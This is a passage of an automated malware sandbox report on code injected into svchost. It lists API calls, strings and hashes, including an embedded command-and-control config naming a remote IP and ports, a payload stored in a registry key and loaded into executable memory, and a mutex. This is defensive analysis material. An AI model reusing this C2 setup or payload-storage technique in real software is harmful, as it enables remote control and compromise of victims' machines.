                                                                                                              • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 001701B0
                                                                                                              • LoadLibraryA.KERNELBASE(?,?,Ws2_), ref: 00170216
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3340160722.0000000000170000.00000040.00000400.00020000.00000000.sdmp, Offset: 00170000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_170000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AllocVirtual$LibraryLoad
                                                                                                              • String ID: 32.d$Ws2_$ll$ntdl
                                                                                                              • API String ID: 2441068224-255390435
                                                                                                              • Opcode ID: fdccc19db2408593c1fdb8b1f75a9a0650cdb8db1fe8c02b4a48aaef36251bd2
                                                                                                              • Instruction ID: defcb698330b0e51a5f1acfd1ac7bbc21bc4dfc51e4d021bcffc4f095d87d6a9
                                                                                                              • Opcode Fuzzy Hash: fdccc19db2408593c1fdb8b1f75a9a0650cdb8db1fe8c02b4a48aaef36251bd2
                                                                                                              • Instruction Fuzzy Hash: FD9188B1908380EFD7269F60C886A2ABBF1FF8C354F15895DF99C86262D771D8009F12
                                                                                                              Function 04DF66E0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 110comCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • CoInitialize.OLE32(00000000), ref: 04DF66EB
                                                                                                              • CoCreateInstance.OLE32(04E156FC,00000000,00000001,04E1571C,?,?,?,?,?,?,?,?,?,?,04DF588A), ref: 04DF6702
                                                                                                              • SysFreeString.OLEAUT32(?), ref: 04DF679C
                                                                                                              • CoUninitialize.OLE32(?,?,?,?,?,?,?,?,?,04DF588A), ref: 04DF67CD
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3350782055.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3350782055.0000000004E24000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_4df0000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: CreateFreeInitializeInstanceStringUninitialize
                                                                                                              • String ID: FriendlyName
                                                                                                              • API String ID: 841178590-3623505368
                                                                                                              • Opcode ID: 731df211c71b2810eaadcc257331965c2f51b86b06b32bdbcae2d6b6b9720a03
                                                                                                              • Instruction ID: 6ee9742d5e32d119ca222c252ecf5f80bdf420dd524caffaf935dd0943b1dafb
                                                                                                              • Opcode Fuzzy Hash: 731df211c71b2810eaadcc257331965c2f51b86b06b32bdbcae2d6b6b9720a03
                                                                                                              • Instruction Fuzzy Hash: 05312C79740605AFDB10DB99CC81EAEB7B9EFC8704F148598FA04EB254DA71ED02CB60
                                                                                                              Function 02583330 Relevance: 3.2, APIs: 2, Instructions: 151timeCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3340758776.0000000002580000.00000040.00001000.00020000.00000000.sdmp, Offset: 02580000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3340758776.000000000259F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_2580000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Time_memmovetime
                                                                                                              • String ID:
                                                                                                              • API String ID: 1463837790-0
                                                                                                              • Opcode ID: b56811716f620937b51e75a6e963b8b6a174ec3a5bce733030ea545f108af4a9
                                                                                                              • Instruction ID: 9c378a59209fa107d289d069f60ed661bcd9f2869c537612e40ccfbe1bbed611
                                                                                                              • Opcode Fuzzy Hash: b56811716f620937b51e75a6e963b8b6a174ec3a5bce733030ea545f108af4a9
                                                                                                              • Instruction Fuzzy Hash: 9B512872700602AFD711EF69C8C4A6ABBA6FF8471471486ACD80AEB710DB70FC41CB94
                                                                                                              Function 02585E30 Relevance: 52.7, APIs: 5, Strings: 25, Instructions: 186registryCOMMONLIBRARYCODE
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              APIs
                                                                                                              • _memset.LIBCMT ref: 02585E61
                                                                                                                • Part of subcall function 02585D60: lstrlenW.KERNEL32(000012A0,?,?,?,?,?,02585E77,p1:,0259C6FE,00000000,0259C6E0,00000000,000012A0,|p1:47.239.116.158|o1:6666|t1:1|p2:47.239.116.158|o2:8888|t2:1|p3:127.0.0.1|o3:80|t3:1|dd:1|cl:1|fz:), ref: 02585D78
                                                                                                                • Part of subcall function 02585D60: _memset.LIBCMT ref: 02585D82
                                                                                                                • Part of subcall function 02585D60: lstrlenW.KERNEL32(|p1:47.239.116.158|o1:6666|t1:1|p2:47.239.116.158|o2:8888|t2:1|p3:127.0.0.1|o3:80|t3:1|dd:1|cl:1|fz:,?,?,?,?,?,02585E77,p1:,0259C6FE,00000000,0259C6E0,00000000,000012A0,|p1:47.239.116.158|o1:6666|t1:1|p2:47.239.116.158|o2:8888|t2:1|p3:127.0.0.1|o3:80|t3:1|dd:1|cl:1|fz:), ref: 02585D8F
                                                                                                                • Part of subcall function 02585D60: lstrlenW.KERNEL32(?,?,?,?,?,?,02585E77,p1:,0259C6FE,00000000,0259C6E0,00000000,000012A0,|p1:47.239.116.158|o1:6666|t1:1|p2:47.239.116.158|o2:8888|t2:1|p3:127.0.0.1|o3:80|t3:1|dd:1|cl:1|fz:), ref: 02585D97
                                                                                                              • RegOpenKeyExW.KERNELBASE(80000001,Console,00000000,00020019,?), ref: 0258600B
                                                                                                              • RegQueryValueExW.KERNELBASE(?,IpDate,00000000,00000003,00000000,00000000), ref: 02586030
                                                                                                              • _memset.LIBCMT ref: 02586048
                                                                                                              • RegQueryValueExW.ADVAPI32(?,IpDate,00000000,00000003,|p1:47.239.116.158|o1:6666|t1:1|p2:47.239.116.158|o2:8888|t2:1|p3:127.0.0.1|o3:80|t3:1|dd:1|cl:1|fz:,0000000A), ref: 02586068
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3340758776.0000000002580000.00000040.00001000.00020000.00000000.sdmp, Offset: 02580000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3340758776.000000000259F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_2580000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: _memsetlstrlen$QueryValue$Open
                                                                                                              • String ID: Console$IpDate$bb:$bd:$bh:$bz:$cl:$dd:$dl:$fz:$jp:$kl:$ll:$o1:$o2:$o3:$p1:$p2:$p3:$sh:$sx:$t1:$t2:$t3:$|p1:47.239.116.158|o1:6666|t1:1|p2:47.239.116.158|o2:8888|t2:1|p3:127.0.0.1|o3:80|t3:1|dd:1|cl:1|fz:
                                                                                                              • API String ID: 3278200350-210159355
                                                                                                              • Opcode ID: 517a17ef7ad74314883f9a9fdabb10b097f54492b5afbe68e9ee746f02b33489
                                                                                                              • Instruction ID: 51247770edaeb5d53f878856a5bc0a7a7e574245720b1da9dd329e8d704c82a1
                                                                                                              • Opcode Fuzzy Hash: 517a17ef7ad74314883f9a9fdabb10b097f54492b5afbe68e9ee746f02b33489
                                                                                                              • Instruction Fuzzy Hash: 685197B5BD230A7AFD3072A48C0BF5DAB957B59F06FD90043BA07391C179D0360949AE
                                                                                                              Function 025854C0 Relevance: 45.8, APIs: 16, Strings: 10, Instructions: 263registrymemorysleepCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              APIs
                                                                                                              • RegOpenKeyExW.KERNELBASE(80000001,Console\0,00000000,00020019,?), ref: 02585507
                                                                                                              • RegQueryValueExW.ADVAPI32(?,d33f351a4aeea5e608853d1a56661059,00000000,00000003,00000000,00000003), ref: 0258552E
                                                                                                              • _memset.LIBCMT ref: 02585548
                                                                                                              • RegQueryValueExW.ADVAPI32(?,d33f351a4aeea5e608853d1a56661059,00000000,00000003,00000000,00000003), ref: 02585563
                                                                                                              • VirtualAlloc.KERNEL32(00000000,000311BF,00003000,00000040), ref: 02585586
                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 025855B1
                                                                                                              • VirtualFree.KERNEL32(?,00000000,00008000), ref: 02585605
                                                                                                              • _memset.LIBCMT ref: 02585669
                                                                                                              • _memset.LIBCMT ref: 0258568D
                                                                                                              • _memset.LIBCMT ref: 0258569F
                                                                                                              • VirtualAlloc.KERNELBASE(00000000,000311BF,00003000,00000040), ref: 02585726
                                                                                                              • RegCreateKeyW.ADVAPI32(80000001,Console\0,?), ref: 02585799
                                                                                                              • RegDeleteValueW.KERNELBASE(?,d33f351a4aeea5e608853d1a56661059), ref: 025857AC
                                                                                                              • RegSetValueExW.KERNELBASE(?,d33f351a4aeea5e608853d1a56661059,00000000,00000003,00000000,00000065), ref: 025857C4
                                                                                                              • RegCloseKey.KERNELBASE(?), ref: 025857CE
                                                                                                              • Sleep.KERNELBASE(00000BB8), ref: 025857FE
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3340758776.0000000002580000.00000040.00001000.00020000.00000000.sdmp, Offset: 02580000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3340758776.000000000259F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_2580000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Value_memset$Virtual$AllocCloseQuery$CreateDeleteFreeOpenSleep
                                                                                                              • String ID: !jWW$.$Console\0$_$a87213ca198a1f1365c74ba3f45f0381$d33f351a4aeea5e608853d1a56661059$e$i$l${vU_
                                                                                                              • API String ID: 354323817-3191071932
                                                                                                              • Opcode ID: bf97293ba02ae8b67120f00d2bf4636e1c430e078b2578dd72fec8eb91fbf81b
                                                                                                              • Instruction ID: c4b38db2efa0160173fd469a63f7b28adcadee2f452740bdf211c2c935f9b56e
                                                                                                              • Opcode Fuzzy Hash: bf97293ba02ae8b67120f00d2bf4636e1c430e078b2578dd72fec8eb91fbf81b
                                                                                                              • Instruction Fuzzy Hash: 8891D7B5A40304ABEB20EF60DC44FAA77BDFB85710F414559F909AB240E7B09E54CF69
                                                                                                              Function 02582D70 Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 203networkstringtimeCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              APIs
                                                                                                              • ResetEvent.KERNEL32(?), ref: 02582D8B
                                                                                                              • InterlockedExchange.KERNEL32(?,00000000), ref: 02582D97
                                                                                                              • timeGetTime.WINMM ref: 02582D9D
                                                                                                              • socket.WS2_32(00000002,00000001,00000006), ref: 02582DCA
                                                                                                              • lstrlenW.KERNEL32(?,00000000,00000000,00000000,00000000), ref: 02582DF6
                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000), ref: 02582E02
                                                                                                              • lstrlenW.KERNEL32(?,00000000,000000CA,00000000,00000000), ref: 02582E21
                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000), ref: 02582E2D
                                                                                                              • gethostbyname.WS2_32(00000000), ref: 02582E3B
                                                                                                              • htons.WS2_32(?), ref: 02582E5D
                                                                                                              • connect.WS2_32(?,?,00000010), ref: 02582E7B
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3340758776.0000000002580000.00000040.00001000.00020000.00000000.sdmp, Offset: 02580000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3340758776.000000000259F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_2580000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ByteCharMultiWidelstrlen$EventExchangeInterlockedResetTimeconnectgethostbynamehtonssockettime
                                                                                                              • String ID: 0u
                                                                                                              • API String ID: 640718063-3203441087
                                                                                                              • Opcode ID: b672445c0f5b4b1ac5483eed8031bcd5367a67eb384ddf1eb5e3a7f34a00c445
                                                                                                              • Instruction ID: c9d73baa4d12fa5ab5a88e82f9e43c595f5ae39ab48e2724df5d295ecb688148
                                                                                                              • Opcode Fuzzy Hash: b672445c0f5b4b1ac5483eed8031bcd5367a67eb384ddf1eb5e3a7f34a00c445
                                                                                                              • Instruction Fuzzy Hash: 14615071A40304AFE720EFA4DC45FAAB7B9FF48710F504519FA46E72C0D7B0A9149B69
                                                                                                              Function 04DF2DA0 Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 203networkstringtimeCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              APIs
                                                                                                              • ResetEvent.KERNEL32(?), ref: 04DF2DBB
                                                                                                              • InterlockedExchange.KERNEL32(?,00000000), ref: 04DF2DC7
                                                                                                              • timeGetTime.WINMM ref: 04DF2DCD
                                                                                                              • socket.WS2_32(00000002,00000001,00000006), ref: 04DF2DFA
                                                                                                              • lstrlenW.KERNEL32(?,00000000,00000000,00000000,00000000), ref: 04DF2E26
                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000), ref: 04DF2E32
                                                                                                              • lstrlenW.KERNEL32(?,00000000,000000CA,00000000,00000000), ref: 04DF2E51
                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000), ref: 04DF2E5D
                                                                                                              • gethostbyname.WS2_32(00000000), ref: 04DF2E6B
                                                                                                              • htons.WS2_32(?), ref: 04DF2E8D
                                                                                                              • connect.WS2_32(?,?,00000010), ref: 04DF2EAB
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3350782055.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3350782055.0000000004E24000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_4df0000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: ByteCharMultiWidelstrlen$EventExchangeInterlockedResetTimeconnectgethostbynamehtonssockettime
                                                                                                              • String ID: 0u
                                                                                                              • API String ID: 640718063-3203441087
                                                                                                              • Opcode ID: 8c3abe4b13f70f474b14b49141ffbb4c4036da4905ea349e5b866d4c454260b7
                                                                                                              • Instruction ID: c4aad1646a616398a0fb9e5e8af894ee2ef0dd1cb6daa12cedb7e9bc9f4993ed
                                                                                                              • Opcode Fuzzy Hash: 8c3abe4b13f70f474b14b49141ffbb4c4036da4905ea349e5b866d4c454260b7
                                                                                                              • Instruction Fuzzy Hash: 886181B1A40304AFE720DFA5DC45FAAB7B8FF48711F10461EFA55A72D0D6B4A9048B64
                                                                                                              Function 04DF6AC0 Relevance: 31.6, APIs: 15, Strings: 3, Instructions: 141memoryCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              APIs
                                                                                                              • GetCurrentProcessId.KERNEL32(75A773E0), ref: 04DF6AE4
                                                                                                              • wsprintfW.USER32 ref: 04DF6AF7
                                                                                                                • Part of subcall function 04DF6960: GetCurrentProcessId.KERNEL32(E179827C,00000000,00000000,75A773E0,?,00000000,04E1213B,000000FF,?,04DF6B03,00000000), ref: 04DF6988
                                                                                                                • Part of subcall function 04DF6960: OpenProcess.KERNEL32(00000400,00000000,00000000,?,00000000,04E1213B,000000FF,?,04DF6B03,00000000), ref: 04DF6997
                                                                                                                • Part of subcall function 04DF6960: OpenProcessToken.ADVAPI32(00000000,00000008,00000000,?,00000000,04E1213B,000000FF,?,04DF6B03,00000000), ref: 04DF69B0
                                                                                                                • Part of subcall function 04DF6960: CloseHandle.KERNEL32(00000000,?,00000000,04E1213B,000000FF,?,04DF6B03,00000000), ref: 04DF69BB
                                                                                                              • _memset.LIBCMT ref: 04DF6B12
                                                                                                              • GetVersionExW.KERNEL32(?), ref: 04DF6B2B
                                                                                                              • GetCurrentProcess.KERNEL32(00000008,?), ref: 04DF6B62
                                                                                                              • OpenProcessToken.ADVAPI32(00000000), ref: 04DF6B69
                                                                                                              • GetTokenInformation.KERNELBASE(?,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 04DF6B8F
                                                                                                              • GetLastError.KERNEL32 ref: 04DF6B99
                                                                                                              • LocalAlloc.KERNEL32(00000040,?), ref: 04DF6BAD
                                                                                                              • GetTokenInformation.KERNELBASE(?,00000019(TokenIntegrityLevel),00000000,?,?), ref: 04DF6BD5
                                                                                                              • GetSidSubAuthorityCount.ADVAPI32 ref: 04DF6BE8
                                                                                                              • GetSidSubAuthority.ADVAPI32(00000000), ref: 04DF6BF6
                                                                                                              • LocalFree.KERNEL32(?), ref: 04DF6C05
                                                                                                              • CloseHandle.KERNEL32(?), ref: 04DF6C12
                                                                                                              • wsprintfW.USER32 ref: 04DF6C6B
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3350782055.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3350782055.0000000004E24000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_4df0000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Process$Token$CurrentOpen$AuthorityCloseHandleInformationLocalwsprintf$AllocCountErrorFreeLastVersion_memset
                                                                                                              • String ID: -N/$NO/$None/%s
                                                                                                              • API String ID: 3036438616-3095023699
                                                                                                              • Opcode ID: 4996705251c7317657f9504f8597b9d0580fa36276456cc0fcfe474f1f63d4ef
                                                                                                              • Instruction ID: 6ebf75ad7dceb3dbf7982e9c98f0114784134a8972e9b43f7670b6632d96693c
                                                                                                              • Opcode Fuzzy Hash: 4996705251c7317657f9504f8597b9d0580fa36276456cc0fcfe474f1f63d4ef
                                                                                                              • Instruction Fuzzy Hash: 1541C970A40214ABEB309F61DD89FEA7B78FB09715F014159FB8592150E639EE91CF60
                                                                                                              Function 04DFAD60 Relevance: 28.3, APIs: 12, Strings: 4, Instructions: 346registryCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 484 4dfad60-4dfad7b 485 4dfad7d-4dfadab RegOpenKeyExW 484->485 486 4dfadd4-4dfaddf 484->486 487 4dfadad-4dfadc3 RegQueryValueExW 485->487 488 4dfadc9-4dfadce 485->488 489 4dfb895-4dfb89b call 4dfce50 486->489 490 4dfade5-4dfadec 486->490 487->488 488->486 492 4dfb89e-4dfb8a4 488->492 489->492 493 4dfae3a-4dfae41 490->493 494 4dfb033-4dfb0eb call 4dff757 call 4e067c0 call 4dff044 call 4e076b0 call 4dff757 call 4dfcf70 call 4dff044 490->494 493->492 497 4dfae47-4dfae79 call 4dff757 call 4e067c0 493->497 540 4dfb1b2-4dfb1d9 call 4dffa79 CloseHandle 494->540 541 4dfb0f1-4dfb13e call 4e076b0 RegCreateKeyW 494->541 506 4dfae7b-4dfae8f wsprintfW 497->506 507 4dfae92-4dfae9e 497->507 506->507 509 4dfaeea-4dfaf41 call 4dff044 call 4e076b0 call 4df2ba0 call 4dff04f * 2 507->509 510 4dfaea0 507->510 512 4dfaea4-4dfaeaf 510->512 516 4dfaeb0-4dfaeb6 512->516 519 4dfaeb8-4dfaebb 516->519 520 4dfaed6-4dfaed8 516->520 524 4dfaebd-4dfaec5 519->524 525 4dfaed2-4dfaed4 519->525 526 4dfaedb-4dfaedd 520->526 524->520 529 4dfaec7-4dfaed0 524->529 525->526 530 4dfaedf-4dfaee8 526->530 531 4dfaf44-4dfaf59 526->531 529->516 529->525 530->509 530->512 534 4dfaf60-4dfaf66 531->534 537 4dfaf68-4dfaf6b 534->537 538 4dfaf86-4dfaf88 534->538 543 4dfaf6d-4dfaf75 537->543 544 4dfaf82-4dfaf84 537->544 539 4dfaf8b-4dfaf8d 538->539 545 4dfaf8f-4dfaf91 539->545 546 4dfaffe-4dfb030 call 4dffa79 CloseHandle call 4dff04f 539->546 561 4dfb19a-4dfb1af RegCloseKey call 4dffb19 541->561 562 4dfb140-4dfb18f call 4dff044 call 4df5a80 RegDeleteValueW RegSetValueExW 541->562 543->538 550 4dfaf77-4dfaf80 543->550 544->539 552 4dfafa5-4dfafac 545->552 553 4dfaf93-4dfaf9e call 4dff04f 545->553 550->534 550->544 559 4dfafae-4dfafb9 call 4dffb19 552->559 560 4dfafc0-4dfafc4 552->560 553->552 559->560 568 4dfafc6-4dfafcf call 4dff04f 560->568 569 4dfafd5-4dfaff9 call 4dff070 560->569 561->540 562->561 580 4dfb191-4dfb197 call 4dffb19 562->580 568->569 569->509 580->561
                                                                                                              APIs
                                                                                                              • RegOpenKeyExW.KERNELBASE(80000001,Console,00000000,00020019,?), ref: 04DFADA3
                                                                                                              • RegQueryValueExW.KERNELBASE(?,IpDatespecial,00000000,?,00000000,?), ref: 04DFADC3
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3350782055.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3350782055.0000000004E24000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_4df0000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: OpenQueryValue
                                                                                                              • String ID: %s_bin$Console$Console\0$IpDatespecial
                                                                                                              • API String ID: 4153817207-1338088003
                                                                                                              • Opcode ID: c52b6cf2a79649bdb3448fdd2d98d9f998e9ca38454eedcfd8fa942c27872e5d
                                                                                                              • Instruction ID: 03f4e3768b8e39178d20fcb5e466a4d9120dde857a2cf9d81b5d684773ce72e5
                                                                                                              • Opcode Fuzzy Hash: c52b6cf2a79649bdb3448fdd2d98d9f998e9ca38454eedcfd8fa942c27872e5d
                                                                                                              • Instruction Fuzzy Hash: 04C1B0B1700201ABE720EF24DC45B6BB7A8FF94718F05452DEE499B381E675FA04C7A2
                                                                                                              Function 04DF61A0 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 222stringcomregistryCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 583 4df61a0-4df61f5 call 4e067c0 call 4e00099 588 4df61f7-4df61fe 583->588 589 4df6251-4df6278 CoCreateInstance 583->589 590 4df6200-4df6202 call 4df60a0 588->590 591 4df627e-4df62d2 589->591 592 4df6472-4df647f lstrlenW 589->592 599 4df6207-4df6209 590->599 600 4df645a-4df6468 591->600 601 4df62d8-4df62f2 591->601 593 4df6491-4df64a0 592->593 594 4df6481-4df648b lstrcatW 592->594 597 4df64aa-4df64ca call 4dff05a 593->597 598 4df64a2-4df64a7 593->598 594->593 598->597 603 4df622b-4df624f call 4e00099 599->603 604 4df620b-4df6229 lstrcatW * 2 599->604 600->592 605 4df646a-4df646f 600->605 601->600 610 4df62f8-4df6304 601->610 603->589 603->590 604->603 605->592 611 4df6310-4df63b3 call 4e067c0 wsprintfW RegOpenKeyExW 610->611 614 4df6439-4df644f 611->614 615 4df63b9-4df640a call 4e067c0 RegQueryValueExW 611->615 618 4df6452-4df6454 614->618 619 4df642c-4df6433 RegCloseKey 615->619 620 4df640c-4df642a lstrcatW * 2 615->620 618->600 618->611 619->614 620->619
                                                                                                              APIs
                                                                                                              • _memset.LIBCMT ref: 04DF61DB
                                                                                                              • lstrcatW.KERNEL32(04E21F10,04E1610C,?,E179827C,00000B9C,00000000,75A773E0), ref: 04DF621D
                                                                                                              • lstrcatW.KERNEL32(04E21F10,04E16388,?,E179827C,00000B9C,00000000,75A773E0), ref: 04DF6229
                                                                                                              • CoCreateInstance.OLE32(04E13480,00000000,00000017,04E167BC,?,?,E179827C,00000B9C,00000000,75A773E0), ref: 04DF6270
                                                                                                              • _memset.LIBCMT ref: 04DF631E
                                                                                                              • wsprintfW.USER32 ref: 04DF6386
                                                                                                              • RegOpenKeyExW.ADVAPI32(80000000,?,00000000,00020019,?), ref: 04DF63AF
                                                                                                              • _memset.LIBCMT ref: 04DF63C6
                                                                                                                • Part of subcall function 04DF60A0: _memset.LIBCMT ref: 04DF60CC
                                                                                                                • Part of subcall function 04DF60A0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,00000000), ref: 04DF60D8
                                                                                                              Strings
                                                                                                              • CLSID\{%.8X-%.4X-%.4X-%.2X%.2X-%.2X%.2X%.2X%.2X%.2X%.2X}, xrefs: 04DF6380
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3350782055.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3350782055.0000000004E24000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_4df0000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: _memset$Createlstrcat$InstanceOpenSnapshotToolhelp32wsprintf
                                                                                                              • String ID: CLSID\{%.8X-%.4X-%.4X-%.2X%.2X-%.2X%.2X%.2X%.2X%.2X%.2X}
                                                                                                              • API String ID: 1221949200-4035668053
                                                                                                              • Opcode ID: 3576b29bcec4ae457c5d4e3d6870f69ec032c2871ce21aa9d5ba2698460362ff
                                                                                                              • Instruction ID: 8016a2833d3563278025a89b845d759a1c1847ac34addffe055898e1b94796ec
                                                                                                              • Opcode Fuzzy Hash: 3576b29bcec4ae457c5d4e3d6870f69ec032c2871ce21aa9d5ba2698460362ff
                                                                                                              • Instruction Fuzzy Hash: 448191B1A40228ABEB24DB65CC41FAAB7B8EF48704F054188F719A7155D774BE81CFA4
                                                                                                              Function 04DF5F90 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 88sleepstringsynchronizationCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              APIs
                                                                                                              • CreateMutexW.KERNELBASE(00000000,00000000,2024. 9.23), ref: 04DF5FB6
                                                                                                              • GetLastError.KERNEL32 ref: 04DF5FBE
                                                                                                              • Sleep.KERNEL32(000003E8), ref: 04DF5FD5
                                                                                                              • CreateMutexW.KERNEL32(00000000,00000000,2024. 9.23), ref: 04DF5FE0
                                                                                                              • GetLastError.KERNEL32 ref: 04DF5FE2
                                                                                                              • _memset.LIBCMT ref: 04DF6009
                                                                                                              • lstrlenW.KERNEL32(?), ref: 04DF6016
                                                                                                              • lstrcmpW.KERNEL32(?,04E16354), ref: 04DF603D
                                                                                                              • Sleep.KERNELBASE(000003E8), ref: 04DF6048
                                                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 04DF6055
                                                                                                              • GetConsoleWindow.KERNEL32 ref: 04DF605F
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3350782055.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3350782055.0000000004E24000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_4df0000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: CreateErrorLastMutexSleep$ConsoleHandleModuleWindow_memsetlstrcmplstrlen
                                                                                                              • String ID: 2024. 9.23$key$open
                                                                                                              • API String ID: 2922109467-483306253
                                                                                                              • Opcode ID: 357f7ad544ac24afdf02df021b4577ef4ee9d3d06016ef955c39b30804ff483b
                                                                                                              • Instruction ID: 408c3eb67cc0bf634bbad7e4a5a5ee8db0bf91bcc730c26196f1900827b46674
                                                                                                              • Opcode Fuzzy Hash: 357f7ad544ac24afdf02df021b4577ef4ee9d3d06016ef955c39b30804ff483b
                                                                                                              • Instruction Fuzzy Hash: 582126727803009BF724EF75EC46B5AB398EB84705F150819EB04971E0EA74FA09CBA3
                                                                                                              Function 04DF74E0 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 99registrylibraryloaderCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              APIs
                                                                                                              • LoadLibraryW.KERNEL32(ntdll.dll,75A773E0,?,?,?,04DF5611,0000035E,000002FA), ref: 04DF74EC
                                                                                                              • GetProcAddress.KERNEL32(00000000,RtlGetNtVersionNumbers), ref: 04DF7502
                                                                                                              • swprintf.LIBCMT ref: 04DF753F
                                                                                                                • Part of subcall function 04DF7460: GetModuleHandleW.KERNEL32(kernel32.dll,GetNativeSystemInfo,?,?,?,?,?,?,?,?,04DF7573), ref: 04DF748D
                                                                                                                • Part of subcall function 04DF7460: GetProcAddress.KERNEL32(00000000), ref: 04DF7494
                                                                                                                • Part of subcall function 04DF7460: GetNativeSystemInfo.KERNELBASE(?,?,?,?,?,?,?,?,?,04DF7573), ref: 04DF74A2
                                                                                                              • RegOpenKeyExW.KERNELBASE(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00020019,000002FA), ref: 04DF7597
